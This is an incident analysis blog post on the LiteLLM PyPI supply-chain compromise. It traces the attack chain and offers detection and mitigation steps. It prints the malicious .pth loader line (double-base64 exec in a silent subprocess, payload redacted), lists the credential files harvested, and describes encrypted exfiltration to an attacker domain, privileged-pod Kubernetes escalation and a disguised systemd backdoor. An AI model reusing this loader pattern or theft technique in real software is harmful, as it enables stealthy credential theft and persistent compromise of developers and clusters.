Tarek Cheikh
Founder & AWS Cloud Architect
Yesterday, one of the most popular Python packages in the AI ecosystem was turned into a weapon. Here is exactly how it happened, what the malware does, and what every developer needs to know.
LiteLLM is an open source Python library that acts as a unified gateway to 100+ LLM providers: OpenAI, Anthropic, Azure, AWS Bedrock, and more. It has about 95 million monthly downloads on PyPI.
Organizations use it as their central LLM proxy. This means that by design, LiteLLM has access to every LLM API key in the organization.
The attacker didn't pick this target randomly.
The LiteLLM compromise was not a standalone attack. It was the third stage of a campaign by a threat actor tracked as TeamPCP.
March 1: Aqua Security, the company behind the vulnerability scanner Trivy, gets breached. Their credential rotation after the incident is incomplete: some tokens survive.
March 19: Using surviving credentials, TeamPCP publishes a compromised version of Trivy. The irony: Trivy is the security scanner organizations run to detect compromises. The attacker compromised the tool that detects compromises.
March 23: Here is the critical link. LiteLLM's CI/CD pipeline had this line in ci_cd/security_scans.sh:
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh
No version pinning. This installs whatever the latest Trivy is, including the compromised one. When LiteLLM's CI ran its security scan, the poisoned Trivy had access to the CI environment's secrets, including PyPI API tokens belonging to maintainer krrishdholakia.
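One common mitigation is to fetch an installer from a fixed tag or commit and refuse to run it unless it matches a digest recorded when the script was reviewed. The following is a minimal sketch of that check, not LiteLLM's or Trivy's actual tooling; `matches_pinned_digest` and the sample script bytes are hypothetical.

```python
import hashlib
import hmac


def matches_pinned_digest(script_bytes: bytes, pinned_sha256: str) -> bool:
    """Return True only if the downloaded script hashes to the pinned digest."""
    actual = hashlib.sha256(script_bytes).hexdigest()
    # Normalise case so an upper-case pinned digest still compares equal.
    return hmac.compare_digest(actual, pinned_sha256.lower())


# Hypothetical data: in practice the digest is recorded at review time
# and the bytes come from the download step in CI.
reviewed_script = b"#!/bin/sh\necho installing a pinned release\n"
pinned = hashlib.sha256(reviewed_script).hexdigest()

print(matches_pinned_digest(reviewed_script, pinned))                   # True
print(matches_pinned_digest(reviewed_script + b"# tampered\n", pinned))  # False
```

A digest check only helps if the pinned value is updated deliberately, after someone has looked at the new script.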
March 23: The attacker registers the domain litellm.cloud through registrar Spaceship, Inc. The legitimate LiteLLM domain is litellm.ai. The similarity is intentional: models.litellm.cloud looks like a real API endpoint in network logs.
March 24, 08:30 UTC: Using the stolen PyPI token, TeamPCP uploads two malicious versions directly to PyPI:

- v1.82.7: malicious code injected into proxy_server.py
- v1.82.8: the same proxy_server.py injection plus a .pth file (more on this below)

No Git tag was created. No GitHub release. No pull request. The attacker uploaded directly to PyPI, completely bypassing code review.
This is the technical trick that makes the LiteLLM attack so dangerous.
Python has a little-known startup mechanism. When the interpreter starts, it scans the site-packages/ directory for files ending in .pth. These files were designed to add directories to Python's import path.
But there is a dangerous feature: any line in a .pth file that starts with import is executed as Python code. Not added to a path. Executed. On every Python interpreter startup. Unconditionally.
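The behavior is easy to reproduce harmlessly. The sketch below writes a one-line .pth file into a temporary directory and asks the standard `site` module to process that directory, which applies the same .pth handling the interpreter uses for site-packages/ at startup. The file name `demo.pth` and the `PTH_DEMO_RAN` marker variable are made up for this illustration.

```python
import os
import site
import tempfile
from pathlib import Path

MARKER = "PTH_DEMO_RAN"  # hypothetical environment variable used as a harmless marker

with tempfile.TemporaryDirectory() as tmp:
    # A line starting with "import" is executed by site.py, not treated as a path.
    Path(tmp, "demo.pth").write_text(
        f"import os; os.environ['{MARKER}'] = '1'\n", encoding="utf-8"
    )
    os.environ.pop(MARKER, None)
    # addsitedir() processes every .pth file in the directory it is given.
    # Side effect: it also appends the directory to sys.path.
    site.addsitedir(tmp)
    pth_line_executed = os.environ.get(MARKER) == "1"

print(pth_line_executed)
```

Nothing in the script imports or calls the code inside `demo.pth`; processing the directory is enough to run it.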
This means:

- No import litellm is needed.
- Any python command triggers it, including python --version.

The attacker placed a file called litellm_init.pth (34,628 bytes) inside the wheel package. When installed via pip, it lands in site-packages/. It contains a single line:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",
"import base64; exec(base64.b64decode(base64.b64decode('PAYLOAD')))"],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
What this does:

- subprocess.Popen: Forks a new child process. Popen (not run or call) returns immediately without waiting. The parent Python process continues normally. The user sees no delay, no error, nothing.
- base64.b64decode(base64.b64decode(...)): Double base64 decoding. The inner call runs first and produces another base64 string. The outer call then produces the actual malware. Double encoding evades scanners that pattern-match on known malicious code.
- exec(...): Executes the decoded 331-line credential harvester in the child process.
- stdout=DEVNULL, stderr=DEVNULL: Suppresses all output. Silent.

There is a catch the attacker apparently didn't fully account for. When the .pth file triggers subprocess.Popen to launch a new Python process, that new process also starts up, scans site-packages/, finds the same .pth file, and triggers it again. And again. And again.
We observed this firsthand in our lab. Starting from a single python3 -c "print('hello')" command:
| Time | Python processes |
|---|---|
| T+0s | 3 (normal) |
| T+1s | 14 |
| T+2s | 55 |
| T+4s | 133 |
| T+13s | 390 |
| T+18s | 509 |
| T+38s | 891 |
| T+40s | Machine dead |
From 3 to 891 Python processes in 38 seconds. The machine ran out of RAM and became completely unresponsive.
This is actually how the attack was originally discovered. Callum McMahon at FutureSearch noticed his machine ran out of RAM when an MCP plugin in the Cursor IDE pulled litellm as a transitive dependency.
Once decoded and executing, the payload is a 331-line Python script that operates in three stages.
The script reads files from well-known paths. Every secret on the machine is a target:
SSH credentials:

- ~/.ssh/id_rsa, ~/.ssh/id_ed25519: private keys
- ~/.ssh/config: host configurations, jump hosts
- /etc/ssh/ssh_host_*_key: server host keys

Cloud provider credentials:

- ~/.aws/credentials: AWS Access Key ID and Secret
- Instance metadata service (169.254.169.254) for IAM role credentials

Kubernetes:

- ~/.kube/config: cluster access
- /var/run/secrets/kubernetes.io/serviceaccount/token: service account token

Application secrets:

- .env files (recursive search to depth 6)
- Shell history (~/.bash_history, ~/.zsh_history)
- Database configuration (.pgpass, .my.cnf, redis.conf)
- Docker credentials (~/.docker/config.json)
- npm configuration (~/.npmrc)
- Terraform files (terraform.tfvars, terraform.tfstate)
- CI configuration (.gitlab-ci.yml, .travis.yml)

The script doesn't crash if a file doesn't exist. It silently skips it. It runs on any machine (developer laptop, CI runner, production server, Kubernetes pod) and takes whatever is available.
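For incident response, the same list can be turned around to scope what needs rotating on a given machine. This is a rough sketch under stated assumptions: `exposed_secrets` is a hypothetical helper, it covers only the home-directory paths named above, and it assumes .pgpass and .my.cnf live directly in the home directory.

```python
from pathlib import Path

# Home-relative paths taken from the lists above.
HOME_RELATIVE_TARGETS = (
    ".ssh/id_rsa",
    ".ssh/id_ed25519",
    ".ssh/config",
    ".aws/credentials",
    ".kube/config",
    ".bash_history",
    ".zsh_history",
    ".pgpass",   # assumed location: home directory
    ".my.cnf",   # assumed location: home directory
    ".docker/config.json",
    ".npmrc",
)


def exposed_secrets(home: Path) -> list[Path]:
    """Return the listed credential files that actually exist under `home`."""
    return [home / rel for rel in HOME_RELATIVE_TARGETS if (home / rel).is_file()]


if __name__ == "__main__":
    for path in exposed_secrets(Path.home()):
        print(f"treat as stolen, rotate: {path}")
```

It does not cover .env files, Terraform state, or the instance metadata service, which need their own checks.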
The stolen data is not sent in plaintext:

- Random key material is generated with openssl rand
- The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
- The result is packaged as tpcp.tar.gz
- The archive is sent to https://models.litellm.cloud/ with an X-Filename header

The RSA public key is hardcoded in the malware. Only the attacker holds the matching private key. Even if you capture the network traffic, you cannot decrypt the contents.
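Since the payload cannot be decrypted, network detection has to key on the destination rather than the content. Below is a minimal sketch that scans log lines for the attacker domains named in this article. The function name and the sample lines are hypothetical, and real proxy or DNS logs will have a different layout.

```python
from typing import Iterable, Iterator

# Attacker-controlled domains named in this article; subdomains match too.
IOC_DOMAINS = ("litellm.cloud", "checkmarx.zone")


def find_ioc_hits(log_lines: Iterable[str]) -> Iterator[tuple[int, str]]:
    """Yield (line_number, domain) for each log line that mentions an IOC domain."""
    for number, line in enumerate(log_lines, start=1):
        lowered = line.lower()
        for domain in IOC_DOMAINS:
            if domain in lowered:
                yield number, domain
                break  # one hit per line is enough


# Hypothetical log excerpt for illustration only.
sample = [
    "CONNECT api.openai.com:443",
    "CONNECT models.litellm.cloud:443",
    "GET https://checkmarx.zone/raw",
    "CONNECT docs.litellm.ai:443",
]
for number, domain in find_ioc_hits(sample):
    print(number, domain)
# 2 litellm.cloud
# 3 checkmarx.zone
```

The legitimate litellm.ai domain is deliberately not matched.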
If the script detects a Kubernetes service account token, it escalates massively:

- Creates pods named node-setup-{node_name} in the kube-system namespace
- Runs them with hostPID: true, hostNetwork: true, privileged: true
- Mounts the node's filesystem at /host

One compromised pip install on a developer laptop can lead to every node in the Kubernetes cluster being backdoored.
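The pod characteristics above are specific enough to hunt for. The sketch below filters a pod list in the JSON shape that `kubectl get pods -n kube-system -o json` produces. `suspicious_pods` and the sample data are hypothetical, and the privileged-plus-host-namespaces rule is a heuristic that can also flag legitimate system pods.

```python
def suspicious_pods(pod_list: dict) -> list[str]:
    """Return names of pods that match node-setup-* or combine
    privileged containers with hostPID and hostNetwork."""
    flagged = []
    for pod in pod_list.get("items", []):
        name = pod.get("metadata", {}).get("name", "")
        spec = pod.get("spec", {})
        privileged = any(
            (container.get("securityContext") or {}).get("privileged") is True
            for container in spec.get("containers", [])
        )
        host_access = spec.get("hostPID") is True and spec.get("hostNetwork") is True
        if name.startswith("node-setup-") or (privileged and host_access):
            flagged.append(name)
    return flagged


# Hypothetical pod list for illustration only.
sample = {
    "items": [
        {"metadata": {"name": "coredns-abc"}, "spec": {"containers": [{"name": "coredns"}]}},
        {
            "metadata": {"name": "node-setup-worker-1"},
            "spec": {
                "hostPID": True,
                "hostNetwork": True,
                "containers": [{"name": "setup", "securityContext": {"privileged": True}}],
            },
        },
    ]
}
print(suspicious_pods(sample))  # ['node-setup-worker-1']
```

To run it against a real cluster, load the kubectl output with `json.load` and pass the resulting dict in.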
The malware installs a backdoor that survives pip uninstall:

- ~/.config/sysmon/sysmon.py: a 44-line Python script
- ~/.config/systemd/user/sysmon.service: a systemd service that auto-starts it

The name "sysmon" is deliberately chosen: it mimics Microsoft's legitimate system monitoring tool. The script:

- Polls https://checkmarx.zone/raw (the attacker's C2 server) every 50 minutes for new payloads

After this step, even pip uninstall litellm doesn't help. The backdoor lives outside pip's control.
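Because the backdoor lives at fixed paths, checking for it is straightforward. Here is a minimal sketch that looks for the two persistence files named above under a given home directory; `find_persistence` is a hypothetical helper name.

```python
from pathlib import Path

# Persistence artifacts named above, relative to the user's home directory.
PERSISTENCE_ARTIFACTS = (
    ".config/sysmon/sysmon.py",
    ".config/systemd/user/sysmon.service",
)


def find_persistence(home: Path) -> list[Path]:
    """Return whichever persistence artifacts exist under `home`."""
    return [home / rel for rel in PERSISTENCE_ARTIFACTS if (home / rel).exists()]


if __name__ == "__main__":
    hits = find_persistence(Path.home())
    for path in hits:
        print(f"backdoor artifact present: {path}")
    if not hits:
        print("no sysmon persistence artifacts found for this user")
```

The check covers one user's home directory at a time, so on shared machines it has to be repeated per account.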
| | v1.82.7 | v1.82.8 |
|---|---|---|
| Injection in proxy_server.py | Yes | Yes |
| .pth file | No | Yes |
| Triggers when | You import litellm.proxy | Any Python command |
| Must use litellm? | Yes | No, just having it installed is enough |
Version 1.82.7 was targeted: it only fires if you actually use the proxy module. Version 1.82.8 was a carpet bomb: every Python invocation triggers it.
12:00 UTC: Callum McMahon at FutureSearch notices his machine running out of RAM.
13:48 UTC: Security issue disclosed on GitHub.
15:00 UTC: PyPI yanks versions 1.82.7 and 1.82.8.
16:00 UTC: PyPI quarantines the entire litellm package.
The attack window was approximately 6.5 hours. During that time, anyone who ran pip install litellm or pip install --upgrade litellm received the compromised version.
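To check whether an environment holds one of the two releases, the installed version can be read from package metadata without importing litellm. This is a sketch using the standard `importlib.metadata` module; the helper names are hypothetical.

```python
from importlib import metadata
from typing import Optional

# The two malicious releases named in this article.
COMPROMISED_VERSIONS = {"1.82.7", "1.82.8"}


def installed_version(package: str = "litellm") -> Optional[str]:
    """Return the installed version of `package`, or None if it is absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


def is_compromised(version: Optional[str]) -> bool:
    """True if `version` is one of the two malicious releases."""
    return version in COMPROMISED_VERSIONS


version = installed_version()
if version is None:
    print("litellm is not installed in this environment")
elif is_compromised(version):
    print(f"litellm {version} is one of the malicious releases")
else:
    print(f"litellm {version} is not one of the two malicious releases")
```

One caveat: if 1.82.8 is installed, starting any Python interpreter in that environment already runs the .pth payload, so on a suspect machine it is safer to inspect the site-packages directory from outside that environment.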
Several factors aligned, among them that LiteLLM's CI installed Trivy with curl | sh without version pinning, inheriting Trivy's compromise.

If you installed litellm 1.82.7 or 1.82.8:

- Run pip show litellm to check your version
- Look for litellm_init.pth in your Python site-packages
- Look for ~/.config/sysmon/sysmon.py on any affected machine
- Look for pods named node-setup-* in your Kubernetes clusters

For everyone:

- Do not install tools with an unpinned curl | sh.
- Audit site-packages/ for .pth files containing executable code.

In Part 2, we detonate the real compromised package on an isolated EC2 instance and capture every stage of the attack with mitmproxy, strace, and inotifywait. We see the fork bomb in real time, watch the credential harvester read our honeypot files, and intercept the exfiltration attempt.
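The .pth audit recommended above can be sketched in Python. The script lists every .pth line that the interpreter would execute rather than treat as a path. The helper names are hypothetical, and a hit is not proof of compromise: setuptools and editable installs also ship .pth files with import lines.

```python
import site
import sysconfig
from pathlib import Path


def executable_pth_lines(directory: Path) -> list[tuple[Path, int, str]]:
    """Return (file, line_number, text) for .pth lines that site.py would execute."""
    hits = []
    for pth in sorted(directory.glob("*.pth")):
        text = pth.read_text(encoding="utf-8", errors="replace")
        for number, line in enumerate(text.splitlines(), start=1):
            # site.py executes lines that begin with "import" plus a space or tab.
            if line.startswith(("import ", "import\t")):
                hits.append((pth, number, line[:120]))  # truncate long payloads
    return hits


def site_directories() -> list[Path]:
    """Collect the site-packages directories of the running interpreter."""
    dirs = {sysconfig.get_paths()["purelib"], site.getusersitepackages()}
    dirs.update(getattr(site, "getsitepackages", lambda: [])())
    return [Path(d) for d in sorted(dirs) if Path(d).is_dir()]


for directory in site_directories():
    for pth, number, line in executable_pth_lines(directory):
        print(f"{pth}:{number}: {line}")
```

On a machine that may be infected, run this with a clean interpreter and call `executable_pth_lines` on the suspect site-packages path, since starting the affected interpreter would itself trigger the payload.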
Full analysis repo with malware samples, lab scripts, and evidence: https://github.com/TocConsulting/litellm-supply-chain-attack-analysis